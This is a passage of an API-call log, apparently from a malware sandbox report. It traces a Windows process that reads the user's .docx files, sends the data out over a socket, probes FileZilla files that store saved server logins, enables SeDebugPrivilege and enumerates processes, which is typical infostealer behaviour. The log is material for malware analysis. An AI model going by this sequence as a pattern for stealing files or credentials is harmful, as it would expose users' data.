hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.270] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.271] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.272] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.272] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.273] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x7e5, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x444, lpBuffer=0x22fe33d, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22fe33d*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x444, lpBuffer=0x22febb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x22febb8*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.278] CloseHandle (hObject=0x444) returned 1 [0262.278] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", nBufferLength=0x105, lpBuffer=0x19edc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", lpFilePart=0x0) returned 0x37 [0262.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f270) returned 1 [0262.278] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yl3vhixizf hfomvle.docx"), fInfoLevelId=0x0, lpFileInformation=0x2328c64 | out: lpFileInformation=0x2328c64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a2f3700, ftCreationTime.dwHighDateTime=0x1d7f0a3, ftLastAccessTime.dwLowDateTime=0x4f2012b0, ftLastAccessTime.dwHighDateTime=0x1d7fb26, ftLastWriteTime.dwLowDateTime=0x4f2012b0, ftLastWriteTime.dwHighDateTime=0x1d7fb26, nFileSizeHigh=0x0, nFileSizeLow=0xfc2f)) returned 1 [0262.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f26c) returned 1 [0262.278] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", nBufferLength=0x105, lpBuffer=0x19ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", lpFilePart=0x0) returned 0x37 [0262.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\.", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", lpFilePart=0x0) returned 0x37 [0262.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", lpFilePart=0x0) returned 0x37 [0262.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", nBufferLength=0x105, lpBuffer=0x19ed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", lpFilePart=0x0) returned 0x37 [0262.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1e4) returned 1 [0262.279] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yl3vhixizf hfomvle.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f260 | out: lpFileInformation=0x19f260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a2f3700, ftCreationTime.dwHighDateTime=0x1d7f0a3, ftLastAccessTime.dwLowDateTime=0x4f2012b0, ftLastAccessTime.dwHighDateTime=0x1d7fb26, ftLastWriteTime.dwLowDateTime=0x4f2012b0, ftLastWriteTime.dwHighDateTime=0x1d7fb26, nFileSizeHigh=0x0, nFileSizeLow=0xfc2f)) returned 1 [0262.279] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e0) returned 1 [0262.279] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", nBufferLength=0x105, lpBuffer=0x19ecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx", lpFilePart=0x0) returned 0x37 [0262.279] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1ac) returned 1 [0262.279] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\yl3VHIXIZf hfomVle.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yl3vhixizf hfomvle.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0262.279] GetFileType (hFile=0x444) returned 0x1 [0262.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1a8) returned 1 [0262.280] GetFileType (hFile=0x444) returned 0x1 [0262.280] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.282] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.282] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.283] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.284] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.284] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.284] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.284] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.284] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.284] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.285] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.285] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.286] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.286] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.286] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.286] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0xc2f, lpOverlapped=0x0) returned 1 [0262.286] ReadFile (in: hFile=0x444, lpBuffer=0x2329963, nNumberOfBytesToRead=0x3d1, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x2329963*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.286] ReadFile (in: hFile=0x444, lpBuffer=0x232a594, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x232a594*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.290] CloseHandle (hObject=0x444) returned 1 [0262.290] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", nBufferLength=0x105, lpBuffer=0x19edc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", lpFilePart=0x0) returned 0x2e [0262.290] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f270) returned 1 [0262.290] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yseudfei7.docx"), fInfoLevelId=0x0, lpFileInformation=0x235e7ac | out: lpFileInformation=0x235e7ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81981900, ftCreationTime.dwHighDateTime=0x1d83a90, ftLastAccessTime.dwLowDateTime=0xf4f75fd0, ftLastAccessTime.dwHighDateTime=0x1d83ef2, ftLastWriteTime.dwLowDateTime=0xf4f75fd0, ftLastWriteTime.dwHighDateTime=0x1d83ef2, nFileSizeHigh=0x0, nFileSizeLow=0xbac0)) returned 1 [0262.291] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f26c) returned 1 [0262.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", nBufferLength=0x105, lpBuffer=0x19ed94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", lpFilePart=0x0) returned 0x2e [0262.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\.", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents", lpFilePart=0x0) returned 0x1f [0262.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", nBufferLength=0x105, lpBuffer=0x19ed44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", lpFilePart=0x0) returned 0x2e [0262.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", nBufferLength=0x105, lpBuffer=0x19edb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", lpFilePart=0x0) returned 0x2e [0262.291] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", nBufferLength=0x105, lpBuffer=0x19ed84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", lpFilePart=0x0) returned 0x2e [0262.291] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1e4) returned 1 [0262.291] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yseudfei7.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f260 | out: lpFileInformation=0x19f260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81981900, ftCreationTime.dwHighDateTime=0x1d83a90, ftLastAccessTime.dwLowDateTime=0xf4f75fd0, ftLastAccessTime.dwHighDateTime=0x1d83ef2, ftLastWriteTime.dwLowDateTime=0xf4f75fd0, ftLastWriteTime.dwHighDateTime=0x1d83ef2, nFileSizeHigh=0x0, nFileSizeLow=0xbac0)) returned 1 [0262.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1e0) returned 1 [0262.292] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", nBufferLength=0x105, lpBuffer=0x19ecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx", lpFilePart=0x0) returned 0x2e [0262.292] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f1ac) returned 1 [0262.292] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\ySeuDfEI7.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\yseudfei7.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x444 [0262.292] GetFileType (hFile=0x444) returned 0x1 [0262.292] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f1a8) returned 1 [0262.292] GetFileType (hFile=0x444) returned 0x1 [0262.292] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.294] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.294] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.294] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.295] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.295] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.295] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.295] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.296] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.296] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.297] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x1000, lpOverlapped=0x0) returned 1 [0262.297] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0xac0, lpOverlapped=0x0) returned 1 [0262.297] ReadFile (in: hFile=0x444, lpBuffer=0x235f69c, nNumberOfBytesToRead=0x140, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x235f69c*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.297] ReadFile (in: hFile=0x444, lpBuffer=0x236003c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f220, lpOverlapped=0x0 | out: lpBuffer=0x236003c*, lpNumberOfBytesRead=0x19f220*=0x0, lpOverlapped=0x0) returned 1 [0262.300] CloseHandle (hObject=0x444) returned 1 [0262.306] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0xf423096a, Data2=0x20c, Data3=0x4fd3, Data4=([0]=0xa8, [1]=0xbb, [2]=0xfc, [3]=0xbc, [4]=0xb1, [5]=0xff, [6]=0x29, [7]=0x5))) returned 0x0 [0262.307] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x23da4960, Data2=0xc8c7, Data3=0x49e5, Data4=([0]=0xac, [1]=0xe1, [2]=0x2b, [3]=0x51, [4]=0xf8, [5]=0x4a, [6]=0x97, [7]=0x9))) returned 0x0 [0262.338] send (s=0x348, buf=0x319cf06*, len=65536, flags=0) returned 65536 [0262.342] send (s=0x348, buf=0x31acf06*, len=65536, flags=0) returned 65536 [0262.864] send (s=0x348, buf=0x31bcf06*, len=65536, flags=0) returned 65536 [0263.113] send (s=0x348, buf=0x31ccf06*, len=65536, flags=0) returned 65536 [0263.192] send (s=0x348, buf=0x31dcf06*, len=65536, flags=0) returned 65536 [0263.277] send (s=0x348, buf=0x31ecf06*, len=1884, flags=0) returned 1884 [0263.471] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 128 [0263.499] CoTaskMemAlloc (cb=0x20c) returned 0x678498 [0263.499] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x678498 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0263.503] CoTaskMemFree (pv=0x678498) [0263.503] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19ed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0263.503] CoTaskMemAlloc (cb=0x20c) returned 0x676f08 [0263.503] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x676f08 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0263.503] CoTaskMemFree (pv=0x676f08) [0263.503] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19ed6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25 [0263.504] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml", nBufferLength=0x105, lpBuffer=0x19ee08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml", lpFilePart=0x0) returned 0x41 [0263.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f268) returned 1 [0263.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\filezilla\\recentservers.xml"), fInfoLevelId=0x0, lpFileInformation=0x19f2e4 | out: lpFileInformation=0x19f2e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0263.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f264) returned 1 [0263.504] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml", nBufferLength=0x105, lpBuffer=0x19ee08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml", lpFilePart=0x0) returned 0x3f [0263.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f268) returned 1 [0263.504] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\filezilla\\sitemanager.xml"), fInfoLevelId=0x0, lpFileInformation=0x19f2e4 | out: lpFileInformation=0x19f2e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0263.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f264) returned 1 [0263.507] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0x30703722, Data2=0xbfc6, Data3=0x4bd4, Data4=([0]=0xac, [1]=0xc5, [2]=0xcf, [3]=0xe5, [4]=0x51, [5]=0x28, [6]=0x3f, [7]=0xba))) returned 0x0 [0263.507] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x764ffa90, Data2=0x372, Data3=0x4f4d, Data4=([0]=0x99, [1]=0x6b, [2]=0x8d, [3]=0xfe, [4]=0xbf, [5]=0xaf, [6]=0x11, [7]=0x7f))) returned 0x0 [0263.507] send (s=0x348, buf=0x319cf07*, len=167, flags=0) returned 167 [0263.508] recv (in: s=0x348, buf=0x2165550, len=8192, flags=0 | out: buf=0x2165550*) returned 128 [0263.595] GetCurrentProcessId () returned 0x9c8 [0263.599] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x19eb4c | out: lpLuid=0x19eb4c*(LowPart=0x14, HighPart=0)) returned 1 [0263.603] GetCurrentProcess () returned 0xffffffff [0263.603] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x19eb48 | out: TokenHandle=0x19eb48*=0x444) returned 1 [0263.604] AdjustTokenPrivileges (in: TokenHandle=0x444, DisableAllPrivileges=0, NewState=0x239ad70*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0263.605] CloseHandle (hObject=0x444) returned 1 [0263.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x321cf20, Length=0x20000, ResultLength=0x19f22c | out: SystemInformation=0x321cf20, ResultLength=0x19f22c*=0x17ab0) returned 0x0 [0263.653] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f214 | out: puCount=0x19f214*=0x2) returned 0x0 [0263.653] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f210*=0x0, pszText=0x0 | out: puBuffLength=0x19f210*=0xf, pszText=0x0) returned 0x0 [0263.653] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, 